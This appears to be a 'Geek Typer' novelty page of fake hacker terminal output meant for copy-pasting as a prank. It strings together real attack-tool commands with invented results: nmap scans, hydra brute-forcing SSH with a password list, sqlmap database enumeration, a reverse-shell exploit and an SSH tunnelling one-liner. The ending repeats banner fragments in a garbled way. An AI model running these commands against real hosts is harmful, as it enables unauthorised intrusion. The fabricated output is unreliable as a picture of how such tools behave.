Geek - Typer Terminal
┌─────────────────────────────────────────────────────────┐ │ GEEK TYPER v2.3.7 || ROOT ACCESS MODE || SECURE │ ├─────────────────────────────────────────────────────────┤ │ > Initializing kernel modules... [ DONE ] │ │ > Spoofing MAC address... 0x7F:3A:2B:9D │ │ > Bypassing firewall ruleset... [ SUCCESS ] │ │ > Encrypting backchannel... AES-256-CBC │ │ > Tracing IP: 185.234.72.19... TOR EXIT NODE │ │ > Decrypting payload... *********** │ │ │ │ ACCESS GRANTED. WELCOME, USER. │ │ │ │ [ root@darkstar ~ ]$ _ │ └─────────────────────────────────────────────────────────┘ For a (copy-paste line by line):
> ssh darknet@anonymous.hack > root@anonymous:~$ sudo su > Password: **************** > [sudo] authentication successful. > root@anonymous:~# nmap -sS -A 10.0.2.15 > Starting Nmap 7.80 ( https://nmap.org ) > Host is up (0.00034s latency). > PORT STATE SERVICE VERSION > 22/tcp open ssh OpenSSH 8.2p1 > 80/tcp open http Apache httpd 2.4.41 > 443/tcp open ssl/http nginx/1.18.0 > 8080/tcp open http-proxy > root@anonymous:~# hydra -l admin -P rockyou.txt ssh://10.0.2.15 > [ATTEMPT] target 10.0.2.15 - login "admin" - pass "123456" > [ATTEMPT] target 10.0.2.15 - login "admin" - pass "password" > [SUCCESS] login: admin pass: letmein > root@anonymous:~# sqlmap -u "http://target.site/page?id=1" --dbs > Parameter: id (GET) – vulnerable to UNION and boolean-based blind > available databases [3]: > [*] information_schema > [*] users_db > [*] corporate_data > root@anonymous:~# ./exploit --payload reverse_shell --lhost 192.168.1.47 > [!] Meterpreter session opened on port 4444 > [*] Sending shellcode... > [✓] Connection established. > root@anonymous:~# whoami > root > root@anonymous:~# echo "HACK THE PLANET" | lolcat > HACK THE PLANET > root@anonymous:~# exit > logout > Connection closed by remote host. > $ If you want a for quick copy-paste into a terminal-like chat: geek typer terminal
$> sudo nmap -sS -A -O --script vuln 192.168.1.0/24 && ssh -D 8080 root@darkweb.onion -N &> ~/logs/scan.log [ SUCCESS ] │ │ > Encrypting backchannel